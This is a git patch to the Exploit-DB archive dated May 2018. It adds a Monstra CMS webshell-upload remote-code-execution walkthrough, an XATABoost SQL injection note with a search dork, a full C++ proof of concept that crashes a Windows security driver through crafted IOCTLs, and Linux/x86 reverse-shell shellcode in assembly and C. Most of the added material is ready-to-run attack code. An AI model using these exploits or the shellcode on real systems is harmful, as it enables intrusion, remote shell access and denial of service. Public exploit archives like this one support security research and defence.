From 2d5885c58b20ac103fae1aa1b1198a12ed9341c4 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 15 May 2018 05:01:47 +0000 Subject: [PATCH] DB: 2018-05-15 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 5 changes to exploits/shellcodes 2345 Security Guard 3.7 - '2345NsProtect.sys' Denial of Service FxCop 10/12 - XML External Entity Injection Microsoft Windows FxCop 10/12 - XML External Entity Injection Apple Safari 3.2.x - 'XXE' Local File Theft Apple Safari 3.2.x - XML External Entity Local File Theft Open-AudIT Community - 2.2.0 – Cross-Site Scripting Open-AudIT Community 2.2.0 - Cross-Site Scripting Monstra CMS 3.0.4 - Remote Code Execution XATABoost 1.0.0 - SQL Injection Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell Shellcode (96 Bytes) --- exploits/php/webapps/44621.txt | 23 ++++ exploits/php/webapps/44622.txt | 21 ++++ exploits/windows/dos/44619.cpp | 176 +++++++++++++++++++++++++++++++ exploits/windows/local/44603.txt | 58 ++-------- files_exploits.csv | 9 +- files_shellcodes.csv | 1 + shellcodes/linux_x86/44620.c | 122 +++++++++++++++++++++ 7 files changed, 356 insertions(+), 54 deletions(-) create mode 100644 exploits/php/webapps/44621.txt create mode 100644 exploits/php/webapps/44622.txt create mode 100644 exploits/windows/dos/44619.cpp create mode 100644 shellcodes/linux_x86/44620.c diff --git a/exploits/php/webapps/44621.txt b/exploits/php/webapps/44621.txt new file mode 100644 index 000000000..4cc0aa20e --- /dev/null +++ b/exploits/php/webapps/44621.txt @@ -0,0 +1,23 @@ +# Exploit Title: Monstra CMS 3.0.4 Upload Plugin Remote code execution CVE-2018-9037 +# Date: 2018-05-14 +# Exploit Author: Jameel Nabbo +# Vendor Homepage: https://github.com/monstra-cms/monstra +# Software Link: https://github.com/monstra-cms/monstra +# Version: 3.0.4 +# Tested on: MAC OSX +# CVE :CVE-2018-9037 + + +Monstra CMS 3.0.4 allows remote code execution via an upload_file request for a .zip file, +which is automatically extracted and may contain .php files. + + +Steps to Reproduce +1: Log in as a user with page editing permissions +2: Upload a plugin archive containing php webshell code +3: After successful upload we can execute the command. + +Then go to: http://127.0.0.1/plugins/{Name_Of_Zip_File_You_Uploaded}/{File_In_Zip}.php + +Solution +Filter plugin content during plugin upload \ No newline at end of file diff --git a/exploits/php/webapps/44622.txt b/exploits/php/webapps/44622.txt new file mode 100644 index 000000000..a4eb857e9 --- /dev/null +++ b/exploits/php/webapps/44622.txt @@ -0,0 +1,21 @@ +# Exploit Title: XATABoost CMS Sql Injection +# Google Dork: inurl:php?id= Powered by XATABOOST +# Date: 02.01.2018 +# Exploit Author: MgThuraMoeMyint +# Vendor Homepage: http://www2.xataboost.com +# Version: 1.0.0 +# Tested on: Kali Linux +# SQL Injection Type: Union Based +# Example URL: http://localhost/news.php?id=[Injection Point] + +Accept-Encoding: gzip, deflate +Referer: http://localhost/news.php?id=[Injection Point] +Connection: keep-alive +GET /xata/nonprofit/000026/css/custom.css.php?x=1c383cd30b7c298ab50293adfecb7b18 +HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: text/css,*/*;q=0.1 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/news.php?id=[Injection Point] \ No newline at end of file diff --git a/exploits/windows/dos/44619.cpp b/exploits/windows/dos/44619.cpp new file mode 100644 index 000000000..aab606557 --- /dev/null +++ b/exploits/windows/dos/44619.cpp @@ -0,0 +1,176 @@ +# Exploit Title: [BSOD by IOCTL 0x8000200D in 2345NsProtect.sys of 2345 Security Guard 3.7] +# Date: [20180513] +# Exploit Author: [anhkgg] +# Vendor Homepage: [http://safe.2345.cc/] +# Software Link: [http://dl.2345.cc/2345pcsafe/2345pcsafe_v3.7.0.9345.exe] +# Version: [v3.7] (REQUIRED) +# Tested on: [Windows X64] +# CVE : [CVE-2018- 11034] + +#include +#include + +struct NETFW_IOCTL_ADD_PID +{ + DWORD pid; + char seed[0x14];// +};//0x18 + +struct NETFW_IOCTL_SET_PID +{ + BYTE set_state;// + BYTE unk;//1 + WORD buf_len;//2 + DWORD pid;//4 + char buf[0x64];//8 +};//6c + +struct NETFW_IOCTL_222040 +{ + DWORD* ptr; + DWORD size; +};// + +int __stdcall f_XOR__12A30(BYTE *a1, BYTE *a2) +{ + int result; + + *a1 ^= *a2; + *a2 ^= *a1; + result = (unsigned __int8)*a2; + *a1 ^= result; + return result; +} + +int __stdcall sub_12A80(char *a1, int len, char *a3) +{ + int result; + unsigned __int8 v4; + __int16 i; + __int16 j; + unsigned __int8 k; + + for ( i = 0; i < 256; ++i ) + a3[i] = i; + a3[256] = 0; + a3[257] = 0; + k = 0; + v4 = 0; + result = 0; + for ( j = 0; j < 256; ++j ) + { + v4 += a3[j] + a1[k]; + f_XOR__12A30((BYTE*)&a3[j], (BYTE*)&a3[v4]); + result = (k + 1) / len; + k = (k + 1) % len; + } + return result; +} + +char *__stdcall sub_12B60(char *a1, signed int len, char *a3) +{ + char *result; + __int16 i; + unsigned __int8 v5; + unsigned __int8 v6; + + v5 = a3[256]; + v6 = a3[257]; + for ( i = 0; i < len; ++i ) + { + v6 += a3[++v5]; + f_XOR__12A30((BYTE*)&a3[v5], (BYTE*)&a3[v6]); + a1[i] ^= a3[(unsigned __int8)(a3[v6] + a3[v5])]; + } + a3[256] = v5; + result = a3; + a3[257] = v6; + return result; +} + +void calc_seed(char* seed, char* dst) +{ + char Source1[26] = {0}; + char a3[300] = {0}; + + Source1[0] = 8; + Source1[1] = 14; + Source1[2] = 8; + Source1[3] = 10; + Source1[4] = 2; + Source1[5] = 3; + Source1[6] = 29; + Source1[7] = 23; + Source1[8] = 13; + Source1[9] = 3; + Source1[10] = 15; + Source1[11] = 22; + Source1[12] = 15; + Source1[13] = 7; + Source1[14] = 91; + Source1[15] = 4; + Source1[16] = 18; + Source1[17] = 26; + Source1[18] = 26; + Source1[19] = 3; + Source1[20] = 4; + Source1[21] = 1; + Source1[22] = 15; + Source1[23] = 25; + Source1[24] = 10; + Source1[25] = 13; + + sub_12A80(seed, 0x14, a3); + sub_12B60(Source1, 0x1A, a3); + memcpy(dst, Source1, 26); +} + +int poc_2345NetFirewall() +{ + HANDLE h = CreateFileA("\\\\.\\2345NetFirewall", + GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, + NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); + if(h == INVALID_HANDLE_VALUE) { + printf("[-] Open device error: %d\n", GetLastError()); + return 1; + } + DWORD BytesReturned = 0; + + DWORD ctlcode = 0x222298; + NETFW_IOCTL_ADD_PID add_pid = {0}; + add_pid.pid = GetCurrentProcessId(); + + if(!DeviceIoControl(h, ctlcode, &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &BytesReturned, NULL)) { + printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError()); + } + + ctlcode = 0x2222A4; + NETFW_IOCTL_SET_PID set_pid = {0}; + set_pid.pid = GetCurrentProcessId(); + set_pid.set_state = 1; + + calc_seed(add_pid.seed, set_pid.buf); + set_pid.buf_len = 26; + + if(!DeviceIoControl(h, ctlcode, &set_pid, sizeof(NETFW_IOCTL_SET_PID), &set_pid, sizeof(NETFW_IOCTL_SET_PID), &BytesReturned, NULL)) { + printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError()); + } + + //BSOD + ctlcode = 0x222040; + NETFW_IOCTL_222040 buf_222040 = {0}; + buf_222040.size = 1; + buf_222040.ptr = (DWORD*)0x80000000; + if(!DeviceIoControl(h, ctlcode, &buf_222040, sizeof(NETFW_IOCTL_222040), &buf_222040, sizeof(NETFW_IOCTL_222040), &BytesReturned, NULL)) { + printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError()); + } + + return 0; +} + +int main() +{ + poc_2345NetFirewall(); + + return 0; +} \ No newline at end of file diff --git a/exploits/windows/local/44603.txt b/exploits/windows/local/44603.txt index 8fe66f378..e9f557443 100644 --- a/exploits/windows/local/44603.txt +++ b/exploits/windows/local/44603.txt @@ -1,34 +1,12 @@ -[+] Credits: hyp3rlinx -[+] Website: hyp3rlinx.altervista.org -[+] Source: http://hyp3rlinx.altervista.org/advisories/MS-WINDOWS-FXCOP-XML-EXTERNAL-ENTITY-INJECTION.txt -[+] ISR: Apparition Security - +# Exploit Title: Microsoft Windows FxCop 10/12 - XML External Entity Injection +# Date: 2018-03-15 +# Exploit Author: Debashis Pal +# Vendor Homepage: www.microsoft.com +# Version: Microsoft Windows "FxCop" v10-12 +# CVE : N/A ***Greetz: indoushka|Eduardo|Dirty0tis*** - -Vendor: -======== -www.microsoft.com - - -Product: -=========== -Microsoft Windows "FxCop" v10-12 - - - -Vulnerability Type: -=================== -XML External Entity - - - -CVE Reference: -============== -N/A - - Security Issue: ================ FxCop is vulnerable to XML injection attacks allowing local file exfiltration and or NTLM hash theft. Tested in Windows 7 and Windows 10 download SDK it works in both. @@ -72,32 +50,10 @@ Exploit/POC: Files get exfiltrated to attacker server. -Network Access: -=============== -Remote - - - -Severity: -========= -High - - - Disclosure Timeline: ============================= Vendor Notification: March 15, 2018 Vendor opens MSRC Case 44322?: March 16, 2018 Vendor reproduces issue : April 6, 2018 Vendor decides to pull all download links instead of advisory or fix : April 9, 2018 -May 9, 2018 : Public Disclosure - - - -[+] Disclaimer -The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. -Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and -that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit -is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility -for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information -or exploits by the author or elsewhere. All content (c). \ No newline at end of file +May 9, 2018 : Public Disclosure \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index fba37c42f..0ffe1d90e 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5970,6 +5970,7 @@ id,file,description,date,author,type,platform,port 44605,exploits/windows/dos/44605.py,"Allok Video Splitter 3.1.12.17 - Denial of Service",2018-05-09,Achilles,dos,windows, 44610,exploits/windows/dos/44610.c,"Dell Touchpad - 'ApMsgFwd.exe' Denial of Service",2018-05-10,"Souhail Hammou",dos,windows, 44615,exploits/windows/dos/44615.cpp,"2345 Security Guard 3.7 - '2345BdPcSafe.sys' Denial of Service",2018-05-11,anhkgg,dos,windows, +44619,exploits/windows/dos/44619.cpp,"2345 Security Guard 3.7 - '2345NsProtect.sys' Denial of Service",2018-05-14,anhkgg,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -9709,7 +9710,7 @@ id,file,description,date,author,type,platform,port 44586,exploits/windows_x86-64/local/44586.rb,"Windows WMI - Recieve Notification Exploit (Metasploit)",2018-05-04,Metasploit,local,windows_x86-64, 44590,exploits/windows/local/44590.txt,"DeviceLock Plug and Play Auditor 5.72 - Unicode Buffer Overflow (SEH)",2018-05-06,hyp3rlinx,local,windows, 44601,exploits/linux/local/44601.txt,"GNU wget - Cookie Injection",2018-05-06,"Harry Sintonen",local,linux, -44603,exploits/windows/local/44603.txt,"FxCop 10/12 - XML External Entity Injection",2018-05-09,hyp3rlinx,local,windows, +44603,exploits/windows/local/44603.txt,"Microsoft Windows FxCop 10/12 - XML External Entity Injection",2018-05-09,hyp3rlinx,local,windows, 44614,exploits/windows/local/44614.txt,"EMC RecoverPoint 4.3 - 'Admin CLI' Command Injection",2018-05-11,"Paul Taylor",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 @@ -10930,7 +10931,7 @@ id,file,description,date,author,type,platform,port 8861,exploits/osx/remote/8861.rb,"Apple iTunes 8.1.1 - 'ITMS' Multiple Protocol Handler Buffer Overflow (Metasploit)",2009-06-03,"Will Drewry",remote,osx, 8880,exploits/linux/remote/8880.txt,"kloxo 5.75 - Multiple Vulnerabilities",2009-06-04,anonymous,remote,linux, 8897,exploits/windows/remote/8897.c,"httpdx 0.8 - FTP Server Delete/Get/Create Directories/Files",2009-06-08,"Jonathan Salwan",remote,windows, -8907,exploits/multiple/remote/8907.txt,"Apple Safari 3.2.x - 'XXE' Local File Theft",2009-06-09,"Chris Evans",remote,multiple, +8907,exploits/multiple/remote/8907.txt,"Apple Safari 3.2.x - XML External Entity Local File Theft",2009-06-09,"Chris Evans",remote,multiple, 8916,exploits/windows/remote/8916.py,"Free Download Manager 2.5/3.0 - Control Server Remote Buffer Overflow",2009-06-09,His0k4,remote,windows,80 8922,exploits/windows/remote/8922.txt,"Worldweaver DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection",2009-06-10,"Core Security",remote,windows, 8930,exploits/windows/remote/8930.txt,"ModSecurity 2.5.9 (Core Rules 2.5-1.6.1) - Filter Bypass",2009-06-11,"Lavakumar Kuppan",remote,windows, @@ -39302,6 +39303,8 @@ id,file,description,date,author,type,platform,port 44606,exploits/hardware/webapps/44606.html,"Fastweb FASTGate 0.00.47 - Cross-Site Request Forgery",2018-05-10,"Raffaele Sabato",webapps,hardware, 44607,exploits/java/webapps/44607.txt,"ModbusPal 1.6b - XML External Entity Injection",2018-05-10,"Trent Gordon",webapps,java, 44608,exploits/php/webapps/44608.txt,"MyBB Latest Posts on Profile Plugin 1.1 - Cross-Site Scripting",2018-05-10,0xB9,webapps,php, -44613,exploits/windows/webapps/44613.txt,"Open-AudIT Community - 2.2.0 – Cross-Site Scripting",2018-05-11,"Tejesh Kolisetty",webapps,windows, +44613,exploits/windows/webapps/44613.txt,"Open-AudIT Community 2.2.0 - Cross-Site Scripting",2018-05-11,"Tejesh Kolisetty",webapps,windows, 44617,exploits/php/webapps/44617.txt,"WUZHI CMS 4.1.0 - 'form[qq_10]' Cross-Site Scripting",2018-05-13,jiguang,webapps,php, 44618,exploits/php/webapps/44618.txt,"WUZHI CMS 4.1.0 - 'tag[pinyin]' Cross-Site Scripting",2018-05-13,jiguang,webapps,php, +44621,exploits/php/webapps/44621.txt,"Monstra CMS 3.0.4 - Remote Code Execution",2018-05-14,JameelNabbo,webapps,php, +44622,exploits/php/webapps/44622.txt,"XATABoost 1.0.0 - SQL Injection",2018-05-14,MgThuraMoeMyint,webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index fbd0d2cf0..d1a155cb3 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -883,3 +883,4 @@ id,file,description,date,author,type,platform 44594,shellcodes/linux_x86/44594.c,"Linux/x86 - execve(/bin/sh) + NOT Encoded Shellcode (27 bytes)",2018-05-06,"Nuno Freitas",shellcode,linux_x86 44602,shellcodes/linux_x86/44602.c,"Linux/x86 - Bind TCP (9443/TCP) Shell + fork() + Null-Free Shellcode (113 bytes)",2018-05-09,"Amine Kanane",shellcode,linux_x86 44609,shellcodes/linux_x86/44609.c,"Linux/x86 - Read /etc/passwd Shellcode (62 bytes)",2018-05-10,"Nuno Freitas",shellcode,linux_x86 +44620,shellcodes/linux_x86/44620.c,"Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell Shellcode (96 Bytes)",2018-05-14,"Paolo Perego",shellcode,linux_x86 diff --git a/shellcodes/linux_x86/44620.c b/shellcodes/linux_x86/44620.c new file mode 100644 index 000000000..8bda0e4e9 --- /dev/null +++ b/shellcodes/linux_x86/44620.c @@ -0,0 +1,122 @@ +/* +; Title: Linux/x86 - TCP reverse shell +; Author: Paolo Perego +; Website: https://codiceinsicuro.it +; Blog post: +https://codiceinsicuro.it/slae/assignment-2-create-a-reverse-shellcode/ +; Twitter: @thesp0nge +; SLAE-ID: 1217 +; Purpose: connect to a given IP and PORT and spawning a reverse shell if +; connection succeded + + +global _start + +section .text + +_start: + +; Creating the socket. +; +; int socket(int domain, int type, int protocol); +; +; socket() is defined as #define __NR_socket 359 on +/usr/include/i386-linux-gnu/asm/unistd_32.h +; AF_INET is defined as 2 in /usr/include/i386-linux-gnu/bits/socket.h +; SOCK_STREAM is defined as 1 in +/usr/include/i386-linux-gnu/bits/socket_type.h +xor eax, eax +xor ebx, ebx +xor ecx, ecx +xor edx, edx + +mov ax, 0x167 +mov bl, 0x2 +mov cl, 0x1 +int 0x80 ; sfd = socket(AF_INET, SOCK_STREAM, 0); +mov ebx, eax ; storing the socket descriptor into EBX for next syscall + +; Connect to my peer +; +; connect() is defined as #define __NR_connect 362 on +/usr/include/i386-linux-gnu/asm/unistd_32.h +; peer.sin_family = AF_INET; +; peer.sin_port = htons(DPORT); +; peer.sin_addr.s_addr = inet_addr(IP); +; ret = connect(sfd, (const struct sockaddr *)&peer, sizeof(struct +sockaddr_in)); + +; 127 = 0x7f +; 0 = 0x0 +; 0 = 0x0 +; 1 = 0x1 + +; push 0x0100007f +mov eax, 0xfeffff80 +xor eax, 0xffffffff +push eax +push word 0x5c11 ; port 4444 is 0x5c11 +push word 0x2 ; AF_INET is 2 + +mov ecx, esp +mov dl, 0x10 ; sizeof(struct sockaddr_in) +xor eax, eax +mov ax, 0x16a +int 0x80 + +test eax, eax ; check if eax is zero +jnz exit_on_error + +; Duplicating descriptor 0, 1, 2 to the socket opened by client +; +; int dup2(int oldfd, int newfd); +; +; dup2 is defined as #define __NR_dup2 63 in +/usr/include/i386-linux-gnu/asm/unistd_32.h + +xor ecx, ecx +mov cl, 2 +xor eax, eax + +dup2: +mov al, 0x3F ; 63 in decimal +int 0x80 ; duplicating file descriptors in backwards order; from 2 to 0 +dec ecx +jns dup2 + +; Executing shell +; +; int execve(const char *filename, char *const argv[], char *const envp[]); +; execve() is defined as #define __NR_execve 11 on +/usr/include/i386-linux-gnu/asm/unistd_32.h + +xor eax, eax +push eax ; The NULL byte +push 0x68732f2f ; "sh//". The second '\' is used to align our command into +the stack +push 0x6e69622f ; "nib/" +mov ebx, esp ; EBX now points to "/bin//sh" +xor ecx, ecx +xor edx, edx +mov al, 0xB ; 11 in decimal +int 0x80 + +exit_on_error: +mov bl, 0x1 +xor eax, eax ; zero-ing EAX +mov al, 0x1 +int 0x80 +*/ +#include +#include + +unsigned char code[] = \ +"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"; + + +int main(int argc, char **argv) +{ +printf("Shellcode Length: %d\n", strlen(code)); +int (*ret)() = (int(*)())code; +ret(); +} \ No newline at end of file